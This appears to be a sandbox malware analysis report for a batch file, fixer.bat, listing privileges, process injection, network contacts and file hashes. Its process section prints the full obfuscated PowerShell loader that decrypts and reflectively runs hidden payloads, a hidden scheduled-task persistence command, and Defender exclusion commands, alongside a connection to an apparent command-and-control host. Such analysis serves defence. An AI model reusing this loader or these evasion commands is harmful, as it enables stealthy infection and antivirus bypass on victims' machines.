Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3124 wrote to memory of 1040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3124 wrote to memory of 1040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1040 wrote to memory of 2476 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1040 wrote to memory of 2476 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3124 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3124 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3124 wrote to memory of 2272 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3124 wrote to memory of 2272 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2272 wrote to memory of 4312 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2272 wrote to memory of 4312 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2272 wrote to memory of 856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 2272 wrote to memory of 856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 856 wrote to memory of 3548 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 856 wrote to memory of 3548 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 4860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3548 wrote to memory of 4860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4860 wrote to memory of 2764 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4860 wrote to memory of 2764 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3548 wrote to memory of 1536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 1536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 3508 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3548 wrote to memory of 3508 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3508 wrote to memory of 1132 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3508 wrote to memory of 1132 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3508 wrote to memory of 224 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3508 wrote to memory of 224 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3508 wrote to memory of 1976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3508 wrote to memory of 1976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3508 wrote to memory of 4888 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3508 wrote to memory of 4888 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3508 wrote to memory of 4024 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3508 wrote to memory of 4024 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4024 wrote to memory of 3020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4024 wrote to memory of 3020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fixer.bat"

C:\Windows\system32\net.exe

net file

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 file

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VR+eOn3wLSvgp0FREd6usaXDBdd/ifgqMzCqfEQSJxE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D+0Hhw9QG/X6TQoVNa+B1g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $hHCjm=New-Object System.IO.MemoryStream(,$param_var); $MjNBp=New-Object System.IO.MemoryStream; $cyqkY=New-Object System.IO.Compression.GZipStream($hHCjm, [IO.Compression.CompressionMode]::Decompress); $cyqkY.CopyTo($MjNBp); $cyqkY.Dispose(); $hHCjm.Dispose(); $MjNBp.Dispose(); $MjNBp.ToArray();}function execute_function($param_var,$param2_var){ $ILtmu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YHkEa=$ILtmu.EntryPoint; $YHkEa.Invoke($null, $param2_var);}$XmQRG = 'C:\Users\Admin\AppData\Local\Temp\fixer.bat';$host.UI.RawUI.WindowTitle = $XmQRG;$YkELo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XmQRG).Split([Environment]::NewLine);foreach ($izSch in $YkELo) { if ($izSch.StartsWith('xHKZaTmGffiyfsNVmown')) { $wrsGY=$izSch.Substring(20); break; }}$payloads_var=[string[]]$wrsGY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_583_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_583.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_583.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_583.bat" "

C:\Windows\system32\net.exe

net file

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 file

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VR+eOn3wLSvgp0FREd6usaXDBdd/ifgqMzCqfEQSJxE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D+0Hhw9QG/X6TQoVNa+B1g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $hHCjm=New-Object System.IO.MemoryStream(,$param_var); $MjNBp=New-Object System.IO.MemoryStream; $cyqkY=New-Object System.IO.Compression.GZipStream($hHCjm, [IO.Compression.CompressionMode]::Decompress); $cyqkY.CopyTo($MjNBp); $cyqkY.Dispose(); $hHCjm.Dispose(); $MjNBp.Dispose(); $MjNBp.ToArray();}function execute_function($param_var,$param2_var){ $ILtmu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $YHkEa=$ILtmu.EntryPoint; $YHkEa.Invoke($null, $param2_var);}$XmQRG = 'C:\Users\Admin\AppData\Roaming\Windows_Log_583.bat';$host.UI.RawUI.WindowTitle = $XmQRG;$YkELo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XmQRG).Split([Environment]::NewLine);foreach ($izSch in $YkELo) { if ($izSch.StartsWith('xHKZaTmGffiyfsNVmown')) { $wrsGY=$izSch.Substring(20); break; }}$payloads_var=[string[]]$wrsGY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Runtime Broker.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDA81.tmp.bat""

C:\Windows\system32\timeout.exe

timeout 3

Network

Country Destination Domain Proto
US 8.8.8.8:53 movie-buddy.gl.at.ply.gg udp
US 147.185.221.16:40572 movie-buddy.gl.at.ply.gg tcp
US 8.8.8.8:53 16.221.185.147.in-addr.arpa udp

Files

memory/2272-0-0x00007FFDFEE33000-0x00007FFDFEE35000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xzuaoncl.0nj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2272-10-0x00007FFDFEE30000-0x00007FFDFF8F2000-memory.dmp

memory/2272-9-0x0000029CC9FD0000-0x0000029CC9FF2000-memory.dmp

memory/2272-11-0x00007FFDFEE30000-0x00007FFDFF8F2000-memory.dmp

memory/2272-12-0x00007FFDFEE30000-0x00007FFDFF8F2000-memory.dmp

memory/2272-13-0x0000029CCA420000-0x0000029CCA466000-memory.dmp

memory/2272-14-0x0000029CCA000000-0x0000029CCA008000-memory.dmp

memory/2272-15-0x0000029CCA010000-0x0000029CCA022000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 df472dcddb36aa24247f8c8d8a517bd7
SHA1 6f54967355e507294cbc86662a6fbeedac9d7030
SHA256 e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA512 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

C:\Users\Admin\AppData\Roaming\Windows_Log_583.vbs

MD5 0654dd1a454d5c2b847dce0f59f5b922
SHA1 bea6406190f36107f5fbad51498fcfbd62367020
SHA256 42ff0396b3f9accbb6fe993139b377dfa0291b4c8e27930aa86406fbbaf02fdf
SHA512 c36b6c6ccc8fac3ef0f8477315a7d7ba864691e1620633c4926827ec8ef0ed4274ab5e2efc09f573a70388356b46c43768fc12a3443e4c2988ffac8435921143

C:\Users\Admin\AppData\Roaming\Windows_Log_583.bat

MD5 1e16a3b0237093cea53d9dff9593c17a
SHA1 4227feac46a1a00827029d784442ca250c3d27b1
SHA256 9dda0e575a133a77c6875c92f5749fd23e7522e17b7abab741a14ad50b7ba833
SHA512 74bbadb0adf926c2cb7f7a5df7de53044c12bd9c4cdd21542c1190206ef8e3356678489c94c1fd099c47f2df8d9d9a981bbe71f3127ef7d402154fff76d10898

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 b49b4568e58d92adb2364d63f8e93e40
SHA1 2f3ea5c739d4bf93fc706580e91a284d05f8809f
SHA256 4d684f3c0fdaf79abec51fb181b2aef1a9ce532408bdc06d6aa6b0c114b699e7
SHA512 2054bf5fc94786910886410a32b3e80a72d6cbc297c8126129c898048224825f520aa134287040abfc19864e672ed2d56ba1dd4ec5e0efca87b2e5c8182da050

memory/3508-43-0x0000025B71C40000-0x0000025B71C52000-memory.dmp

memory/3508-44-0x0000025B71ED0000-0x0000025B71EE6000-memory.dmp

memory/2272-45-0x00007FFDFEE30000-0x00007FFDFF8F2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f65feb0fbbd0fcb9da91d117a38e4f31
SHA1 95b1256dd050df6d555a4d06d4dc7ac542b6a070
SHA256 cb0bff45abfcccadc000e77840ccf5004ae4197a8d98baab877e6e9c238bba0c
SHA512 0715ba19e75a60eeb6cf98f4bc80980f1f1e681bd69d3ce242bf1c50787b82eb99064de0c0753c4259dcc8837a65ac2b7c84b3c1f114200cb252c05e448b1776

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA1 9910190edfaccece1dfcc1d92e357772f5dae8f7
SHA256 0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA512 5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9030854a24cf37b7b4e3650aac67d427
SHA1 27f3e35705bbe6388da04bf97e09da1875a6bc71
SHA256 e818d49edbec3553b77c8a400c04fc88b601614946c281fc9c86acf9498010e0
SHA512 f402098f60d99d7e7130095c6965bb540454ff9867e72a9c2efaf833967639b802f193f9e73af53829167b43a2d9100e19f9056621f75543fa2aadad1e185dfd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a116d56b723a0d248b5a38cbc3429288
SHA1 75efdbe43b0db5b4b4761166e1a6926316715f54
SHA256 f17648922a442aed77374620c12e8a0fb492290a191204ccdb1eca3dcf2d6258
SHA512 a19db0a5120a5857571ec2593d80e9d78405a9fb4bee0f358c8dca484d1f2760d79cdb9a7abfd48db1175d09be6b190e0d02837f59cc10f212215f16b14986c0

C:\Users\Admin\AppData\Local\Temp\tmpDA81.tmp.bat

MD5 2e33c6b784aa31150c78fd6063e3a88a
SHA1 4c0af3d16cb4a4a5b8f3433b642b086066da5218
SHA256 d93f9bbb1e7613b7d354be6333a7a5eac2c3019c626d9f00973d4bdb697906ae
SHA512 4db0eb6184b5afa3314d01d98652cb8e74a1dfe1f5632fe79b92a8c6c1e0bcd8630f02165e4034b26ea49f1b567f63f296981d3b658e24383895a3b68695b338